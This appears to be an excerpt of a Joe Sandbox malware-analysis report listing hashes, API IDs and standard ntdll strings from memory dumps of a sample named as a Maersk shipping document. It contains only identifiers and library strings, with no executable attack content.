                                                    • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                    • Instruction ID: 99dd0bb410a2787ffd581fb0ebf0e87224e8061264122b0ff0a249861019dd9e
                                                    • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                    • Instruction Fuzzy Hash: 0AF02472600204AFE714DB21CD06F86F7F9EF98300F148078A545C7164FAB0ED10C654
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                    • Instruction ID: 94e3ede71048611eb505aa6b0d60509d85833652ac7dd53dc13b29f197d9c6e2
                                                    • Opcode Fuzzy Hash: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                    • Instruction Fuzzy Hash: 28F04F70A01249AFCB04EF69D559EAEB7F4EF18344F008055A955EB395DA34EB01CB50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                    • Instruction ID: 09648bd036a9eb067ef1f1ee50114b07f31a8f397193437fba34f2ee9f41869e
                                                    • Opcode Fuzzy Hash: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                    • Instruction Fuzzy Hash: 16F024319962E08FE736CB1CE044B21FBC49B80630F8C4B6AC54B83102C3A1E880C611
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                    • Instruction ID: 97f346df34b90fcdcf59a4d8a1d9842a333d72946d1f7e4c8b9849ddc4a1cf34
                                                    • Opcode Fuzzy Hash: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                    • Instruction Fuzzy Hash: 32F02726415A8086CF335B3C64503D16B58E741314F2D1045EDA0D7206D5748B83C729
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                    • Instruction ID: eea122ec1d062aef45c7e61260f658f3659cc8eb95c2e650e1184a3740e4ce42
                                                    • Opcode Fuzzy Hash: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                    • Instruction Fuzzy Hash: 0EF0EC725256999FE7239B2CC148B61FBF8AB017B0F1C986EE506C7512C360E880CA61
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction ID: a3f8b1357714e489ed819792044ec0cfde2be78becaa54882413dc40ba870679
                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction Fuzzy Hash: F2E0D8723406012BE7129F598CC8F47BBEEDFDAB10F040479B6045F256CAE2DD0986A4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                    • Instruction ID: 7fc8a785a75296ba99d360c0638f0dc041f30bd1febf5c0ff1ae08ac83b5e600
                                                    • Opcode Fuzzy Hash: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                    • Instruction Fuzzy Hash: 7190023120540802D604725848046874005D7D1301F55C025A7024675ED765CAA57232
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                    • Instruction ID: c832d196e41a9951aaecbaafad7b9651a6469ddb13cf567fc6fd441ca621e374
                                                    • Opcode Fuzzy Hash: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                    • Instruction Fuzzy Hash: 9A900225225400020645B658060450B4445E7D7351395C029F24165B0CC721CA795322
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                    • Instruction ID: ca2ef29ed05e5a28a9142894a2deb963cefc1c507e1fdef0be8db907a2f877b9
                                                    • Opcode Fuzzy Hash: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                    • Instruction Fuzzy Hash: 5D900225215400030605B65807045074046D7D6351355C035F2015570CD721CA755222
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                    • Instruction ID: 39f898736abb3c8ac36f8f185b0d8b5313997ddfe245d2dd3b24bf2ad4288d22
                                                    • Opcode Fuzzy Hash: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                    • Instruction Fuzzy Hash: D99002A1205540924A00B3588404B0B8505D7E1201B55C02AE2054570CC625CA659236
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                    • Instruction ID: 50a82235597b351e2992b5d30f079a6bc7014ebe88bb28efa8f4beea9e501ba8
                                                    • Opcode Fuzzy Hash: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                    • Instruction Fuzzy Hash: 5090022130540003D640725854186078005E7E2301F55D025E1414574CDA15CA6A5323
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                    • Instruction ID: ebff6c630a43aa281a827125bb8981e0712b2e54e7ac38fb2bab17018018985c
                                                    • Opcode Fuzzy Hash: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                    • Instruction Fuzzy Hash: CC90022921740002D6807258540860B4005D7D2202F95D429A1015578CCA15CA7D5322
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                    • Instruction ID: 542fa46c1c09bdf752870486bb3e02cb083f04796fe813daf2275f8fc1d2d118
                                                    • Opcode Fuzzy Hash: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                    • Instruction Fuzzy Hash: 1F90022120944442D60076585408A074005D7D1205F55D025A20645B5DC735CA65A232
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                    • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                    • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                    • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                    • Instruction ID: 8444e8c5c073f08537f5feee0e5ad5f02bc349f8d6c074850bdbcaa0278670ac
                                                    • Opcode Fuzzy Hash: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                    • Instruction Fuzzy Hash: 5990023124540402D641725844046074009E7D1241F95C026A1424574EC755CB6AAB62
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                    • Instruction ID: 46c990dd8ed61010dd6670d268d27b14a518f24a921ec6edbfbf1a7cb9b8fd13
                                                    • Opcode Fuzzy Hash: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                    • Instruction Fuzzy Hash: 2490023120540842D60072584404B474005D7E1301F55C02AA1124674DC715CA657622
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                    • Instruction ID: 517ad7e89975005f97a2a8a5e667bc5ea15cb1d4b5e75f3dc0b28dd1704168f0
                                                    • Opcode Fuzzy Hash: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                    • Instruction Fuzzy Hash: 7D90023120540403D600725855087074005D7D1201F55D425A1424578DD756CA656222
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                    • Instruction ID: 79336149b241350bb2d54b870bdcfdbd48e0d8f5ee45252b92eba27cbca614a1
                                                    • Opcode Fuzzy Hash: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                    • Instruction Fuzzy Hash: A690022160940402D640725854187074015D7D1201F55D025A1024574DC759CB6967A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                    • Instruction ID: fd27892a745314af67f8a0688a96114a181443fe2dba9f9ab1fcdc923572a964
                                                    • Opcode Fuzzy Hash: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                    • Instruction Fuzzy Hash: D590023120540402D600769854086474005D7E1301F55D025A6024575EC765CAA56232
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                    • Instruction ID: 2841014abdc4105725c73c00277c66941673532dd50bf5416d59aef19869d387
                                                    • Opcode Fuzzy Hash: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                    • Instruction Fuzzy Hash: 7090026121540042D604725844047074045D7E2201F55C026A3154574CC629CE755226
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                    • Instruction ID: 6b7912cbe98c6291d18cdd3d23f79d03c31e2cce709b24ae8e4f3bd5564c3674
                                                    • Opcode Fuzzy Hash: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                    • Instruction Fuzzy Hash: E690026134540442D60072584414B074005D7E2301F55C029E2064574DC719CE666227
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                    • Instruction ID: 0fca94e7977060ebeb59763a7dc45cb4d812b3cb0d3e7c2aabcc05a946e0f4f6
                                                    • Opcode Fuzzy Hash: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                    • Instruction Fuzzy Hash: 96900221215C0042D70076684C14B074005D7D1303F55C129A1154574CCA15CA755622
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                    • Instruction ID: 7ffa2d21d7ff0ce122559bda0b6cc416f7c2735e1bee329888a0144cf54fb9c7
                                                    • Opcode Fuzzy Hash: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                    • Instruction Fuzzy Hash: B1900221605400424640726888449078005FBE2211755C135A1998570DC659CA795766
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                    • Instruction ID: e1f079f35e608d5ad94e785f17228664fbe32c919039a0edbb27b7bfd8048554
                                                    • Opcode Fuzzy Hash: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                    • Instruction Fuzzy Hash: E090023120580402D600725848087474005D7D1302F55C025A6164575EC765CAA56632
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                    • Instruction ID: d9febb8f12a19f75aa4bdab3256b3f537965d7c5311e4116f97cbde6e9e5cafe
                                                    • Opcode Fuzzy Hash: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                    • Instruction Fuzzy Hash: B590023120580402D6007258481470B4005D7D1302F55C025A2164575DC725CA656672
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                    • Instruction ID: bd5b6988b98bdd7ebfd36082277141264e73849b87d19ccc65e5120ae462754f
                                                    • Opcode Fuzzy Hash: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                    • Instruction Fuzzy Hash: 3390022130540402D602725844146074009D7D2345F95C026E2424575DC725CB67A233
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                    • Instruction ID: d7e9c6c208ee8a8ed4764d7b09ae70e6b349872286f701461f9c6b919a6d5ba1
                                                    • Opcode Fuzzy Hash: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                    • Instruction Fuzzy Hash: 9A90026120580403D640765848046074005D7D1302F55C025A3064575ECB29CE656236
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                    • Instruction ID: 90dc857c85d3e8993448a6292bc9f7599339c03b67bac65335ab26f228d8309d
                                                    • Opcode Fuzzy Hash: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                    • Instruction Fuzzy Hash: 8590027120540402D640725844047474005D7D1301F55C025A6064574EC759CFE96766
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    Strings
                                                    • ExecuteOptions, xrefs: 018146A0
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                    • Execute=1, xrefs: 01814713
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                    • RTL: Re-Waiting, xrefs: 0181031E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 01817B8E
                                                    • RTL: Re-Waiting, xrefs: 01817BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                    Strings
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                    • RTL: Resource at %p, xrefs: 018172A3
                                                    • RTL: Re-Waiting, xrefs: 018172C1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
